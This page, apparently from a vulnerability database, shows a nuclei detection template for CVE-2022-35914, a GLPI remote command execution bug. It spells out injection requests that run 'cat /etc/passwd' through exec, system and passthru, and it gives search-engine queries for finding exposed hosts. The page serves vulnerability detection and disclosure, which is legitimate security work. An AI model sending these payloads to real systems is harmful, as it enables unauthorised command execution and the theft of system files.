Lucene search
+L

GLPI <=10.0.2 - Remote Command Execution

🗓️ 21 Jul 2026 03:59:43Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 502 Views

GLPI <=10.0.2 - Remote Command Execution in htmlawed module. Impacts remote system command execution. Upgrade to version higher than 10.0.2

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for SQL Injection in Dolibarr
3 Apr 202610:02
githubexploit
GithubExploit
Exploit for Injection in Glpi-Project Glpi
30 Sep 202216:43
githubexploit
GithubExploit
Exploit for Injection in Glpi-Project Glpi
30 Sep 202216:43
githubexploit
GithubExploit
Exploit for Injection in Glpi-Project Glpi
24 Apr 202406:39
githubexploit
GithubExploit
Exploit for Injection in Glpi-Project Glpi
25 Aug 202419:32
githubexploit
GithubExploit
Exploit for Injection in Glpi-Project Glpi
21 Jul 202621:08
githubexploit
GithubExploit
Exploit for Injection in Glpi-Project Glpi
24 Apr 202406:39
githubexploit
zdt
GLPI 10.0.2 Command Injection Exploit
25 Oct 202200:00
zdt
zdt
htmlLawed 1.2.5 - Remote Code Execution Exploit
19 May 202400:00
zdt
ALT Linux
Security fix for the ALT Linux 9 package glpi version 9.5.9-alt1
23 Sep 202200:00
altlinux
Rows per page
id: CVE-2022-35914

info:
  name: GLPI <=10.0.2 - Remote Command Execution
  author: For3stCo1d,allendemoura
  severity: critical
  description: |
    GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
  remediation: |
    Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability.
  reference:
    - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914
    - https://github.com/cosad3s/CVE-2022-35914-poc
    - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35914
    - https://github.com/glpi-project/glpi/releases
    - https://senderend.medium.com/pg-practice-box-deep-dive-glpi-c3a1cf1520f8
    - https://github.com/allendemoura/CVE-2022-35914
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-35914
    cwe-id: CWE-74
    epss-score: 0.99696
    epss-percentile: 0.9995
    cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: glpi-project
    product: glpi
    shodan-query:
      - http.favicon.hash:"-1474875778"
      - http.title:"glpi"
    fofa-query:
      - icon_hash="-1474875778"
      - title="glpi"
    google-query: intitle:"glpi"
  tags: cve,cve2022,glpi,rce,kev,glpi-project,vkev,vuln
variables:
  cmd: "cat+/etc/passwd"
  execFunc1: "system"
  execFunc2: "passthru"

http:
  - raw:
      - |
        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: sid=foo

        sid=foo&hhook=exec&text={{cmd}}
  - raw:
      - |
        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: sid=foo

        sid=foo&text={{execFunc1}}&hfoo={{cmd}}&hhook=array_map
  - raw:
      - |
        POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: sid=foo

        sid=foo&text={{execFunc2}}&hfoo={{cmd}}&hhook=array_map

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008cc7d5dfacc2195554313886818dece29aebc5e8eeb599c69c5878edf79161820220688108045d22dfac8fb640de1a6d17f6794a01a90d3c2d443e190a3b4b41114d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9High risk
Vulners AI Score9
CVSS 3.19.8
EPSS0.99696
SSVC
502